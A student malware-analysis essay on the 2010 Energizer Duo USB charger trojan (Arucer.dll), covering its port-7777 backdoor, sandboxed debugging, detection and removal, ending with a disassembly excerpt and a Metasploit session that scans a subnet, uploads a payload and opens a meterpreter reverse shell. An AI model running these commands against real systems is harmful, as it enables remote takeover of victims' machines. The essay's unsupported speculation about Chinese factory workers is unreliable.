This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.
This is a report on the Energiser trojan. The Energiser trojan was discovered in March 2010 as part of the software suite shipped with the Energy Duo USB Battery charger by the Energiser company which left a back door trojan on a users computer system that enabled an attacker to remotely control the infected system. For this report the trojan was installed in a virtualised system and its effects analysed. A proposal was also determined on how this malware may have ended up being shipped as a piece of legitimate software.
A trojan is a piece of software that masquerades as a piece of legitimate software with a useful purpose but instead damages a users computer system. The name trojan horse derives from Greek Mythology where a large wooden horse was used by the Greeks to gain access to the city of Troy. Similarly, a trojan program can be used to deliver a payload, a piece of code that deliberately harms a computer by performing actions such maliciously deleting files, performing denial of service, harvesting passwords, sensitive information etc. The actual trojan itself causes no harm to a computer system, it is the payload deployed by the trojan or the exploit performed by the attacker that causes the damage. Trojan malware is the highest accounted for of all malware worldwide with BitDefender, a leading security website stating it accounts for ï¿½83-percent of the global malware detected in the world". One of the main malicious uses of trojans is in the creation of botnets, large groups of compromised computers that can be used for spamming, phishing and launching Denial of Service attacks.
The Energiser Trojan
In March 2010 a Trojan was discovered as part of the software suite that accompanied the Energy Duo USB Battery charger. Produced by the Energiser battery company, the product was a simple charger for rechargeable batteries that allowed a user recharge their batteries through the USB port on their computer system with accompanying software to display to the user how much charge was in their batteries. The product went on sale around the world in May 2007 accompanied with the battery charger software for both Windows and Macintosh computers but it wasn't until March 2010 that an exploit was discovered in the software.
Overview of the Trojan's Deployment
The Trojan is only present on the Windows software for the Energy Duo USB Battery charger, and the only way the trojan can be installed on a system is when the user runs the accompanying product software, i.e. it cannot be picked up in the wild, by accessing tainted websites etc.
Upon running, The Energiser software suite installs two files onto the users system, the files Usbcharger.dll, and the file Arucer.dll. It is this file Arucer.dll that is the actual trojan on the user's system. The Usbcharger.dll, file is copied into the application directory while the Arucer file is copied into the C:\WINDOWS\system32\ directory. The program then modifies the Windows registry to enable the program to run every time the infected system is started up.
The registry key that is created is HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The Arucer.dll file then uses the Usbcharger.dll, to enable communication through the USB interface. The USB communication library executes the Arucer.dll by using the rundll.exe program.
This is a standard Windows Operating system program that for runs Windows Dynamic Link Libraries and places them in memory. The Arucer.dll acts as a back door to a users system accepting communication through the TCP protocol on port 7777. The installed trojan acts with the same privileges as the user who installed it, so on most Home Windows systems, where the user is configured as default superuser the program would have full administration privileges.
The main security vulnerabilities that are left on the users system are the attacker has the ability to list all the directories on the users PC, execute programs and applications and send and receive files. The ability to send and receive files perfectly sets up the infected PC to act as part of a bot net causing malicious attacks on other PCs and networks.
Performing an analysis of the Trojan
The trojan was deployed in a virtualised environment to perform a thorough analysis of the malware. Since the Trojan was reported, the application had been covered by a security web blog called Skull Security.. This security blog included a step by step breakdown of the malware and the actions it performed on a users PC . The instructions given on this security blog were referenced as a guide to seeing the malware in effect first hand.
Beginning the Analysis
The analysis was run in a VMWare virtualised environment so as not to open the test PC to infection. The operating system was a fresh installation of Windows XP with no anti-virus or anti-spyware installed. The programs WinDbg, the Windows debugging toolkit, The IDA Pro Disassembler and Debugger and the NMAP network security tool were downloaded to assist in the investigation . These tools were all installed on the clean image of Windows XP running in my Virtual Environment. Finally a copy of the malware infected program was downloaded. ]. Before the malware installation the command nstat -na was used in the Windows command prompt to first determine which ports and networks connections were open on an uninfected computer.
Fig1:Uninfected PC before installation of the malware
From the displayed screenshot it is plain to see that there are 16 open ports on the PC. The other ports are 123, 135,137,138, 139, 445, 500, 1025, 1026, 1030, 1036, 1900, 4500. Checking the Gibson Research Corporation the functionality of these ports can be determined.
Port 123 is the NTP, network time protocol port used for client to query servers for the time/date. Port 135 is the dcom-scm, DCOM Service Control Manager used for listening to requests from incoming clients. 
Port137 is the netbios-ns port, the NetBIOS Name Service used for querying packets and asking them to disclose and return their current set of NetBIOS names. 
Port 138 is the netbios-dgm port, the NETBIOS Datagram Service, also use for exchanging netbios ports. 
Port 139 is the netbios-ssn port, NETBIOS Session Service Similar to ports 135,137 and 138, this port exchanges TCP NetBIOS information. 
Port 445 is the microsoft-ds port, Microsoft Directory Services port. This is used for Windows files sharing and other services. 
Port 500 is the isakmp port, the Internet Security Association and Key Management Protocol (ISAKMP). This is used for Internet key exchange in VPNs. 
Port 1025, 1026, 1030 These are Microsoft Windows Ports used for publicly exposed services.
Port 1036 is the pcg-radar, RADAR Service Protocol. 
Port 1900 is the ssdp, UPnP Simple Service Discovery Protocol port used to recieve messages from from other UPnP devices. 
Port 4500 is the ipsec-msft port, Microsoft IPsec NAT-T used for Internet Protocol security (IPSec) communication. 
These ports are standard on any Microsoft Windows system and there is nothing untoward about them. Some of these ports do have existing security issues and would be switched off in a secure installation but this is just to determine a baseline of the standard ports left open in typical Windows configuration on a system.
Fig2:Installed Energizer Software on the PC
The malware infected software was then installed onto the virtualised system. Immediately after installation, the Windows firewall brought up a Windows Security alert saying a program wanted to run a DLL as an pap. After allowing the Windows Security Alert access to the internet, the command nstat -na was used again in the Windows command prompt to display the open ports. Checking the list of ports again it was easy to see another opened port, Port 7777. This is the port that the Malware opens on the PC and allows malicious code to be executed from the PC.
Fig3:Installed software and open port 7777
Arucer.dll, the trojan file is run by the rundll.exe Windows program.
By using the WinDbg Windows debugging tools it can be confirmed that the Arucer.dll, file is being called by the Windows rundll.exe. The WinDbg tool was used to put a breakpoint on the rundll.exe to debug any time that the file Arucer.dll is called. After putting on the breakpoint, using the telnet application to port 7777 starts debugging the Arucer,dll as soon as the telnet program commences.
Fig4:Confirming Arucer,dll called by rundll.exe
The Arucer.dll, file itself is stored in C:\Windows\System32\. Using the IDA Pro disassembler the code can be dissassembled to view the inner workings of trojan.
Fig4:Arucer.dll trojan disassembled, showing possible programmers name
The first thing that is apparent is that there appears to be an authors name in the code. ï¿½liuhong-061220ï¿½.This is very strange as most virus and worms contain encryption and don't include the authors name. We can also see the actual socket that the Trojan constructs and leaves open, on a loop, ready to receive instructions for anyone that can detect the Trojan.
Exploits for the Trojan
The most immediate consequences of the Energizer Trojan on a system is that it leaves a users system to exploitation by unauthorised users. The ability to remotely control a system, list the system directories, receive and send files, and execute programs is a highly desirable back door on a system that many attacker would be keen to use for malicious uses Because of this,shortly after knowledge of the trojan was made available, various scanners and exploits were developed to take advantage of it.
Metaploit is a well known framework of various penetration testing tools that can be used to scan for a particular exploit and then introduce a payload onto a system. It is an easy to use tool that can be used to exploit computer systems and even those without considerable knowledge of cracking or computer security could use it to take over an infected system. Within hours of the Energizer Trojan going public a Metaploit exploit had been developed for it. The Metasploit framework also enables an attacker use numerous pre constructed payloads that can be dumped onto an exploited machine with a couple of commands enabling the attacker do untold damage to a system with very little effort.
Detecting the Energizer Trojan
An experiment was then run to see if easily available anti-virus or anti-spyware software would detect the Trojan. The Trojan had been widely publicised in various computer security and technical websites so it would be interesting to see if the anti-virus and anti-spyware would detect it. I had only been a month since the announcement of the trojan and it would be interesting to see if the Security Software companies had picked up on this recent trojan. To test this AVG anti-virus and the Search and Destroy anti-spyware software was downloaded and installed onto the virtualised machine.
Installing the software and running the anti-virus to scan the virtual machine hard drive, the Arucer.dll trojan was detected by the program.
Fig5:Arucer.dll detected by antivirus
Since the trojan had been so widely publicised, appearing on well known websites like Slashdot and The Register it is likely that all antivirus and spyware companies had quickly implemented a detection module for the trojan as soon as details of its existence were published.
Removing the Energizer Trojan
Removing the Energizer Trojan was relatively easy for such a dangerous exploit. To remove the exploit first the Energiser battery charger software was uninstalled. Then the file Arucer.dll was removed from the C:\WINDOWS\system32\ directory. The firewall list was restored so the "Run a DLL as an App" entry was removed from the firewall listings, preventing other DLL's running as an application. Finally the port the Trojan connected through, port 7777 was disabled preventing access to the internet by the Trojan. This returned the system to its original state
Assessment of the Energiser Trojan
The Energiser Trojan is an interesting piece of software. There are several factors that are thought-provoking in regard to the trojan.
The Energiser battery company is a reputable company and would not deliberately wish to introduce a back door trojan onto their customers computer systems. The resulting bad publicity was very damaging for the company and they have since stopped selling the product and preventing the software being downloaded. The company also announced they are launching an investigation into how the malware ended up on a piece of software they were providing to customers.. The fact that the Energy Duo USB Battery charger had been on sale worldwide since 2007 and the trojan was not discovered until March 2010 meant that it is probable that a large number of computer systems had been compromised and exploited. The fact that for the three years the trojan had been on computers all over Europe and America and no anti virus or spyware software had discovered it's existence is also worrying.
Another strange thing about the Energizer trojan is the author of the software has added his name to the code. Authors of malware generally use a handle or nickname if they want recognition for their coding as putting their real name on malware code would only lead to criminal prosecution. Also, most malware is generally encrypted and deliberately made obscure so anyone disassembling the code will find it difficult to understand the true purpose of the code. However, the code of the Energiser trojan is clear and easy to read.
Another point is the majority of malware attacks are exceedingly difficult to remove from a system. Its not uncommon for computer systems suspected of having a back door trojan to be wiped clean instead of removing it as the risk of missing something and leaving the system still compromised is high. The Energiser trojan, however can be removed in four simple steps.
These facts seems to indicate that the trojan may not have been a deliberately created to be a piece of malware. One hypotheses is that in these days of outsourcing and most manufacturing conducted in China, it is likely that the Energiser Battery company contracted a Chinese company to manufacture their battery charger, the Energy Duo USB Battery charger. It is unlikely a USB battery charger software would need any reason to access the internet and one hypothesis is that the application was developed from an existing code base, perhaps an MP3 player software. Perhaps code was copied to develop the battery charging software and some of the original codes functionality was not removed. In any case it was a serious quality control error for the manufacturing company and a real blow to the reputation of the Energiser company.
Energizer are not the only company that have shipped goods that have been contaminated with malware, MacDonalds ran an offer giving away MP3 player that had spyware present and Seagate shipped hard drives that were also contaminated with malware. Both these products, similar to the Energisers Battery charger, were built in China. It easy to see how hackers could get their malware onto freshly manufacture hardware. In minimum wage manufacturing plants in China it would be easy for hackers to bribe or threaten staff to deploy the malware. Security would also most likely be lax or non-existent so hackers themselves could enter the plants and distribute their malicious applications. Another probability is that the software running on computer systems in the manufacturing plants themselves are contaminated and during the manufacturing process, while testing or validating constructed hardware, the new hardware becomes infected.
A point of note is just how quickly that an exploit was developed for the trojan as soon as its existence was made public. As soon as it became widely publicised that a backdoor trojan was present on all computer systems running the software, that gave an attacker the ability to remotely control a PC then exploitation code became commonly available. It was the 5th of March 2010 when Symantic Security Software first reported the existence of the trojan, the Register then reported it on the 8th of March 2010 and the very same day Nmap scans and Metasploit exploitation code was made publicly available on the internet to search for the trojan and exploit the user's system. It is a very good illustration of how good that hackers are at moving on a known security issue. However the trojan had been in existence since 2007. A disturbing alternative scenario is that exploitation code had been in existence since well before the publication of the code and that compromised systems had been remotely accessed by attackers or used for malicious purposes.
What is apparent from the example of the Energiser Trojan is just how easy unsecure software can end up on a users PC. Lack of quality control in the manufacturing and development of a product and detachment on the part of the Energizer company led to them shipping software that compromised the users computer system. When a user buys a product they expect a duty of care on the part of the business not to leave their computer open to damage and the resulting storm of bad publicity across the internet was duly deserved.
Sample Trojan Code
A sample of the trojan code indicating the authors name, liuhong-061220
.text:10001040 public Arucer
.text:10001040 Arucer proc near
.text:10001040 call sub_10002610
.text:10001045 test eax, eax
.text:10001047 jz short locret_10001072
.text:10001049 push offset Name ; "liuhong-061220"
.text:1000104E push 0 ; bInitialOwner
.text:10001050 push 0 ; lpMutexAttributes
.text:10001052 call ds:CreateMutexA
.text:10001058 push 0 ; lpThreadId
.text:1000105A push 0 ; dwCreationFlags
.text:1000105C push 0 ; lpParameter
.text:1000105E push offset StartAddress ; lpStartAddress
.text:10001063 push 0 ; dwStackSize
.text:10001065 push 0 ; lpThreadAttributes
.text:10001067 call ds:CreateThread
.text:1000106D call sub_10002910
This is exploit code that the Metaploit framework can use to the Energizer trojan to cause damage to an infected compueter system. This code uses the Metaploit Framework to sniff through a number of internet IP addresses to search for an infected system and deploy a payload onto it. Taken from the Metaploit website. .
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer